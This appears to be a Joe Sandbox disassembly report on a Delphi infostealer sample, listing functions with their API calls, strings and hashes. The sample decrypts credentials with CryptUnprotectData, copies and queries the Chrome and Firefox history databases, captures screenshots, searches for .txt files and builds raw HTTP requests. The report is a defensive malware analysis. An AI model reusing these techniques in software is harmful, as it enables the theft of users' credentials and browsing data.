Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18

Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58

Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
LocalFree.KERNEL32(?), ref: 0040950A

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A

Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698

Function 00407A34 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 00418124 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279

Strings

HTTP/1.0, xrefs: 00418393
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 004183AF
Content-Length: , xrefs: 004183B9
, xrefs: 004184B6
, xrefs: 004183FE
wsock32.dll, xrefs: 0041819D
User-agent: , xrefs: 004183AA
Host: , xrefs: 00418398
Connection: close, xrefs: 004183A5

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 384173800-3355491746
Opcode ID: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
Opcode Fuzzy Hash: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58

Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

wtsapi32.dll, xrefs: 00407E12
CreateEnvironmentBlock, xrefs: 00407E24
WTSQueryUserToken, xrefs: 00407E0D
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
userenv.dll, xrefs: 00407E29
D, xrefs: 00407E5D
kernel32.dll, xrefs: 00407DFB

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
Opcode Fuzzy Hash: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68

Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

wtsapi32.dll, xrefs: 00407E12
CreateEnvironmentBlock, xrefs: 00407E24
WTSQueryUserToken, xrefs: 00407E0D
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
userenv.dll, xrefs: 00407E29
D, xrefs: 00407E5D
kernel32.dll, xrefs: 00407DFB

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
Opcode Fuzzy Hash: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58

Function 004178B4 Relevance: 18.2, APIs: 12, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00417994
CreateCompatibleDC.GDI32(00000000), ref: 0041799D
CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
SelectObject.GDI32(00000000,00000000), ref: 004179B6
BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
GlobalLock.KERNEL32(?), ref: 00417A80
GlobalUnlock.KERNEL32(?), ref: 00417AA2
DeleteObject.GDI32(00000000), ref: 00417AA8
DeleteDC.GDI32(00000000), ref: 00417AAE
ReleaseDC.USER32(00000000,00000000), ref: 00417AB6

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
String ID:
API String ID: 734935659-0
Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58

Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004129E8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
DeleteFileW.KERNEL32(00000000), ref: 00412C05

Strings

%TEMP%, xrefs: 00412A23
.tmp, xrefs: 00412A03
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
, xrefs: 00412B98

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58

Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004125B0
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
DeleteFileW.KERNEL32(00000000), ref: 004127CD

Strings

SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
.tmp, xrefs: 004125CB
, xrefs: 00412760
%TEMP%, xrefs: 004125EB

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58

Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0

Strings

Runtime error at 00000000, xrefs: 0040339A, 004033D9
Error, xrefs: 004033D4

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
DeleteFileW.KERNEL32(00000000), ref: 004110EC

Strings

, xrefs: 00411078
.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58

Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(015385D8,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(?,00000000,00008000,015385D8,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(015395D8,?,00000000,00008000,015385D8,00000000,00401A0A), ref: 004019D1
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,015385D8,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,015385D8,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
DeleteFileW.KERNEL32(00000000), ref: 00410DBE

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58

Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410945
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
DeleteFileW.KERNEL32(00000000), ref: 00410B06

Strings

.tmp, xrefs: 00410960
%TEMP%, xrefs: 00410980

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58

Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

FPUMaskValue, xrefs: 00402B10
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677

Strings

IsWow64Process, xrefs: 00406656
kernel32.dll, xrefs: 0040665B

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D

Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
